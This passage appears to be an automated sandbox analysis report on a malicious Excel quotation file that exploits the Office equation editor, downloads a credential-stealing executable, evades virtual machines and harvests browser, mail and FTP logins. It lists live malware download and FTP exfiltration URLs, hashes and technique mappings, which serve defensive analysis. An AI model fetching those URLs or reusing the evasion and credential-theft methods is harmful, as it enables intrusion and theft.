                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2056Thread sleep time: -300000s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 2820Thread sleep time: -45877s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 2956Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 1412Thread sleep time: -540000s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 1436Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 1436Thread sleep time: -510000s >= -30000s
                Source: C:\Users\Public\Regasm_svchost.exe TID: 2088Thread sleep count: 9428 > 30
                Source: C:\Users\Public\Regasm_svchost.exe TID: 1436Thread sleep count: 53 > 30
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Regasm_svchost.exeWindow / User API: threadDelayed 9428
                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\Public\Regasm_svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\Public\Regasm_svchost.exeProcess information queried: ProcessInformation
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 45877
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Regasm_svchost.exeThread delayed: delay time: 30000
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
                Source: EQNEDT32.EXE, 00000002.00000002.980447357.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[I
                Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: EQNEDT32.EXE, 00000002.00000002.980394637.00000000005A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Users\Public\Regasm_svchost.exeProcess token adjusted: Debug
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_033F05E2 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\Public\Regasm_svchost.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\Public\Regasm_svchost.exeMemory written: C:\Users\Public\Regasm_svchost.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
                Source: C:\Users\Public\Regasm_svchost.exeProcess created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
                Source: C:\Users\Public\Regasm_svchost.exeQueries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation
                Source: C:\Users\Public\Regasm_svchost.exeQueries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation
                Source: C:\Users\Public\Regasm_svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\Public\Regasm_svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\Public\Regasm_svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\Public\Regasm_svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\Public\Regasm_svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: Yara matchFile source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                Path Interception111
                Process Injection
                111
                Masquerading
                2
                OS Credential Dumping
                211
                Security Software Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scripting
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Disable or Modify Tools
                1
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                Exfiltration Over Bluetooth33
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts22
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)131
                Virtualization/Sandbox Evasion
                Security Account Manager131
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer21
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Scripting
                Cached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                Obfuscated Files or Information
                DCSync114
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
                Software Packing
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 680486 Sample: Quotation - Optical Eyeglas... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 11 other signatures 2->42 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 34 35 2->12         started        process3 dnsIp4 26 198.12.89.152, 49179, 80 AS-COLOCROSSINGUS United States 7->26 20 C:\Users\user\AppData\Local\...\mon[1].exe, PE32 7->20 dropped 22 C:\Users\Public\Regasm_svchost.exe, PE32 7->22 dropped 44 Office equation editor establishes network connection 7->44 46 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->46 14 Regasm_svchost.exe 7->14         started        24 C:\...\~$Quotation - Optical Eyeglasses.xlsx, data 12->24 dropped file5 signatures6 process7 signatures8 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->48 50 Machine Learning detection for dropped file 14->50 52 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->52 54 Injects a PE file into a foreign processes 14->54 17 Regasm_svchost.exe 12 2 14->17         started        process9 signatures10 28 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->28 30 Tries to steal Mail credentials (via file / registry access) 17->30 32 Tries to harvest and steal ftp login credentials 17->32 34 Tries to harvest and steal browser information (history, passwords, etc) 17->34

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Quotation - Optical Eyeglasses.xlsx35%VirustotalBrowse
                Quotation - Optical Eyeglasses.xlsx32%ReversingLabsDocument-Office.Exploit.CVE-2018-0802
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe100%Joe Sandbox ML
                C:\Users\Public\Regasm_svchost.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                6.0.Regasm_svchost.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://ZSkVPd.com0%Avira URL Cloudsafe
                http://198.12.89.152/mon/mon.exehhC:100%Avira URL Cloudmalware
                ftp://ftp.alonsorojasmudanzasnacionales.com/okok100%Avira URL Cloudmalware
                http://198.12.89.152/mon/mon.exe100%Avira URL Cloudmalware
                http://77qlBFDgeMeBhXCCMul.org0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://198.12.89.152/mon/mon.exetrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://ZSkVPd.comRegasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://198.12.89.152/mon/mon.exehhC:EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                ftp://ftp.alonsorojasmudanzasnacionales.com/okokRegasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://77qlBFDgeMeBhXCCMul.orgRegasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  198.12.89.152
                  unknownUnited States
                  36352AS-COLOCROSSINGUStrue
                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:680486
                  Start date and time: 08/08/202217:25:262022-08-08 17:25:26 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 0s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Quotation - Optical Eyeglasses.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Adjust boot time
                  • Enable AMSI
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  17:26:43API Interceptor173x Sleep call for process: EQNEDT32.EXE modified
                  17:26:54API Interceptor830x Sleep call for process: Regasm_svchost.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:downloaded
                  Size (bytes):896512
                  Entropy (8bit):7.735833585263268
                  Encrypted:false
                  SSDEEP:12288:YZkGxgV2iNq+1MCVjjwDcYj5DHXYQn1qLbxhbJE3d7h4eAwRXIbUDbLDuXkjZc0I:KkGxgV10Ctw1jQ/xhbJEtOe9IbUDHDl
                  MD5:A6439DBBF3F848EB6F83494C5C75A7A6
                  SHA1:8381D3D1AC7CAA3BD8033F17B36C8D0ABE54480E
                  SHA-256:1D806C678B4CC86F4BCB769B1D1E613D0AF28336DBAD4FACD0A04ED959D9EDBA
                  SHA-512:AC573AEE0DC0C2C4E3439B6BC3AADCB244310E1713E2E27DA5B752DE6C2E93847002263B11B70D9CD8889D1E81CAA90DA53720909C789755702AF9D132173157
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  IE Cache URL:http://198.12.89.152/mon/mon.exe
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(....!...........................................0..........*....0.............K...%.r...p.%.rK..p.%.rY..p.}......}.....(.... .m/. ..~fa%..^E........5.......d.......E...+b...(..... ~...Z .f.=a+..{.....(...... .,d.Z ..{a+... ..c.Z &.8Va+...{.....(..... ...zZ .77.a8u...~....t.....{....(....&*.0..:........ ..h ...>a%..^E................+..(..... 6;..Z Qb..a+..*...0...........*...0.................{....(.....(..... .... .rG.a%....^E................v...U.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):10770
                  Entropy (8bit):5.171884184642559
                  Encrypted:false
                  SSDEEP:192:HeQeAkykQp+2m+xLu4jA+6+rtBLPQgkUeKCrkKnU7eBiRUgQDMzvudxhnGu7+mRp:He5AkykQp+2NxLLjA+6+rtBLNkUeKC3z
                  MD5:DAE5E2360C20E41A74B50234EAF58B2D
                  SHA1:A310025AAC3C93073F16BEF2056A5C398D9A41BA
                  SHA-256:D5106547F8BF1B9CAB7C24DA1B648CAD51D96120B00B9AC07AF384FEB750D187
                  SHA-512:30EEDD5DCB85B2FF225B165A9B915FA06B787A78BF28A54CB46A7684FE9D94D783E2FFBB800BAA64464FDD56A112F74FB91567F8AA65EC5B68C670289B932912
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:.....H.....}........S........................}.H.......5.K...................-...................".....-...........................".....-...........I.B.......-...............$...........M...|...................X.......................?...`.............}...r...g...\.".P.7.D.I.7.Z.+.i...u.......................................u...i.w.Z.j.I.].7.Q.".E...9.......#.............`...?.......................X...................|...M...................`...2...................Y...1...................z...Z...;.........#.......9...E...Q...]...j.r.w.e...[...S...M...I...H...I...M...S...[...e...r.....+...7...D...P...\...g...r...}.;...Z...z...................1...Y...................2...`.................................-...............-.......-............z........-...........,...$.....M...Q...U...}.........2...............w.a...5...!...%.B...R.............%...M.....-...............-.......-............B........-...........$...$.........d...C..."......... .....d.!...&.../.../.S.X.?...N.............-.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):9142
                  Entropy (8bit):5.831641085312416
                  Encrypted:false
                  SSDEEP:192:sjsCW0P2qkxIn67FhDbOMQRJsXaZjwIawoLevwFtCJo/0HR70Q/XGI+yaIWS4g4D:sjsV0PNkW67FhDaMQfsXaWIawT4FtCJg
                  MD5:EDFEF94C6F9587BC790758D5D9693D50
                  SHA1:76FF70799E5EF874B611264C4DB94164D050A3F7
                  SHA-256:ED699D5F9576FDCF0E39EF03C10F2CEA8890B4942DD7AB78BF1DE07676962FD5
                  SHA-512:11F535B4A9A5547E9FB3F1F258486569F5028186F1FD18BF35C060EAA4886D67CB7054CA81289FACC9133D25FF268D6D2A12E7230A9998FAAEB1FAF002AF20AB
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:.....H.....U.....................b...........U.H.......E.....................-...................".....-...........................".....-.....................-...............$...H.U.H.........U.H.U...................-.......-.......-............h........-...............$...........................-...............-.......-...........[.........-...............$.D...t.................t...a...N...;...'...............................w..._...G.../.........................!.|.$.b.&.G.).,.+...,...-......./.../.../.e...G.-.).,...*...(...%...".....}...a...F...+...........................{...d...M...7...!.................................t.....-...............-.......-............h........-...............$.....h.C.h.C.........h.....-...............-.......-............h........-...............$...........................-...............-.......-............h........-...........b...$./.............2...Q...o.........................w.4.l.N._.g.S...F...8...X...c.q.m.].w.I...4.......................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):12600
                  Entropy (8bit):5.406932409911072
                  Encrypted:false
                  SSDEEP:384:Iz4+CJDxb6kHwPh86pEnCHuNMK4fed1dLUHLq65CgO2GmmQYbh3xpJGvuCeJWlnx:IrCJDxb6kHwPh86pEnCHuNMK4fe7dL2F
                  MD5:E36EE51F1EC331B2FD1E62230CE4CDC9
                  SHA1:23C604663C21D30FCA671802EF5DCE892A32C79A
                  SHA-256:90CABD958AF7364A82D304E222B295BDE98A2FE5500037ACEA267FA7CF098E11
                  SHA-512:DD26855CE91F02E42B4352C5264CA00082B5766558689A704346C89703942A21E053B2E0C8F0B19D469973BACA28526929AAE75303F5D17B71CBFF654297BA89
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:.....p. .(.........fT............6.............p.......9.....................-...................".....-...........................".....-.....................-...............$.f.~.L.|.N.{.P.y.R.w.T.s.O.p.K.l.F.h.B.d.=.a.9.\.4.X./.N.%.D...:.../...%.................................................$.......9...C.u.M.j.W._.a.T.k.H.t.=.}.1...%.............................................................................{.&.t.1.m.<.d.G.\.R.R.\.I.g.?.q.5.{.+...!.........................................................$.../...9...C...L...U...[...a...h.&.n...t.5.{.;...B...H...J...L...M.~.L...................-...............-.......-.....................-...............$.f...P...b...t.........$.../...:...E...W...c...g.c.f.;._...S...C.../...4...9...>...C...G...L...S...Z...c...l...w.0...B...S...d...t...........................n...I...&...............................................................&.#.3.4.?.F.K.W.U.j._.|.i...q...y...U...4.....{...g...Q...7.......'...4...A...O...Z...c...h.{.i.v.b.o.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):30838
                  Entropy (8bit):5.787956459094822
                  Encrypted:false
                  SSDEEP:768:nMGzaVVMT1poZEPXkwr0JG1+BZiuJPzMFE5O5A71uWZ1ldyKuDWTSWTiRYWiBSjt:DlCXap6we73MRT53
                  MD5:31B4D83D0B440E38EB9C724FD362C679
                  SHA1:C6CDB84DB8608C87BD5F3FABCA9AAD67C36B0CD9
                  SHA-256:AA78BC64D62F0DFC44611F0EAAEE8551C81F82A7C334073B431C96D2097900EE
                  SHA-512:D1877808772B6AEA5A20316B234884383D1165716C98EE8B8C32AE6238FB1454662F1DEE88C5FFAF645ABFAA66C47C889BB44FC59F3DD780884FA590B865D1DF
                  Malicious:false
                  Preview:.........H.J........S......0<................J.........<.L...................-...................".....-...........................".....-....................-...............$.....J.I...I.........J...................-...............-.......-.......-...............$...<...<.....>.....<.......-.......-.......-....................-...............$.....,.&...&. .......,.....-...............-.......-.......-...............$.....0.....3...3.....0.....-.......-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.A.........................4. .H.+.[.9.k.G.z.W...h...y...................................*.z.;.k.K.[.Y.H.g.4.r...|.........................p...W...?...).|...r...g...Y...K...;...*...................................y...h...W...G...9...+... .)...?...W...p...............-...............-.......-....................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 114 x 111, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):9007
                  Entropy (8bit):7.965803762230949
                  Encrypted:false
                  SSDEEP:192:xDL+FFfJ6pI4ySj0Qxd2ZSgFGOkBeNn+SG7J2r1KCYZ19:xv+DfJ6K4BlX7I1+SQS7Yh
                  MD5:A21ED528A4278D2D5C5518576B119CB1
                  SHA1:581711E69D65B716A391510C48F77C420453ECBD
                  SHA-256:81C1CD8E58D3B4F5EC76BFC6436EC2FDF1D3B5233AEC0CD6C6E5FE9B424C65C9
                  SHA-512:3A360478C6532545062CB0C5E1E7F07CD040D67665248FF1BD253689B2D0C8EB8FA507471626674BBBD8227F98873FEA6A046382FBA7739E4D4286C42D938729
                  Malicious:false
                  Preview:.PNG........IHDR...r...o.....0..8....sRGB....... .IDATx^........t..3.......dy..7....5.DQDL4.hp.AE.Wp.z...Q.._4*".......e..DA....f...U.LM.=./...s....k.....w.-.u]...{?.Z...{....7..W......E.>}.... [...M=5.1..]fcR....N.....c#.=9q............b....5u.)...M.Y.....%..^w=.......m...}....&8....~.....m.z...< ...7....1...o.!kj..j.X..{.....h.#....;P..o`..x.-..9W.. +...?e/.Cm.|.7.jL..p]..:...n..j.o!1R.F.ad...c.C...f..MCL.V......hx4a.....@.[.D.S.?..E..:w...]..#..........cg..t..-./~Oq.."V.=...@.=EBo...w. .|....JrE.~.K...%..As..0.w.c../`6#F.V.j...ea...z....2.0.A.a.....)0.O..:.tOl.P....8.q.&..:!.ir...*.4.@......D...hn..={.m[..8.....bi6@....W........[[...hH.8...%V.....k. ...!.].x.l0.q.Y...8...qa..v]..$|..j~|$.k.k.............>..@F.a..'QTS.#.E.........X...V...:...(..G\..`..5....[....p..R...h.......:4..u..5..&...A..q.u...cq..\S1P@....H.;....^}..c.-..'..D..=..t.Gs.u0..U...D.a...#.P(F.....W..x...k........Y..g....,;J..A.mB..k.sI.}QL...Rq.q.n.00...[....:......
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ms-windows metafont .wmf
                  Category:dropped
                  Size (bytes):30838
                  Entropy (8bit):5.787956459094822
                  Encrypted:false
                  SSDEEP:768:nMGzaVVMT1poZEPXkwr0JG1+BZiuJPzMFE5O5A71uWZ1ldyKuDWTSWTiRYWiBSjt:DlCXap6we73MRT53
                  MD5:31B4D83D0B440E38EB9C724FD362C679
                  SHA1:C6CDB84DB8608C87BD5F3FABCA9AAD67C36B0CD9
                  SHA-256:AA78BC64D62F0DFC44611F0EAAEE8551C81F82A7C334073B431C96D2097900EE
